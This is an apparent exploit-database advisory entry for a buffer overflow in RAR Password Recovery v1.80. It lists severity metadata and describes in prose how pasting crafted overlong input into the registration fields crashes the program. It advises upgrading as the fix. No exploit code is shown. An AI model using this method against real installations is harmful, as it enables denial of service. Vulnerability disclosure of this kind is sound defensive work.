vendor: RAR Password Recovery
by: Achilles
CVSS: 7.8 HIGH
Denial of Service
CWE: 119
Product Name: RAR Password Recovery
Affected Version From: v1.80
Affected Version To: v1.80
Patch Exists: YES
Related CWE: N/A
CPE: a:top-password:rar_password_recovery
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64, Windows XP SP3
2019
RAR Password Recovery v1.80 Denial of Service Exploit
A buffer overflow vulnerability exists in RAR Password Recovery v1.80 when a maliciously crafted User Name and Registration Code are processed, which could allow an attacker to cause a denial of service condition. An attacker can leverage this vulnerability by creating a maliciously crafted file, copying its contents to the clipboard, and then pasting them into the User Name and Registration Code fields of the application. This causes the application to crash.
Mitigation:
Upgrade to the latest version of RAR Password Recovery.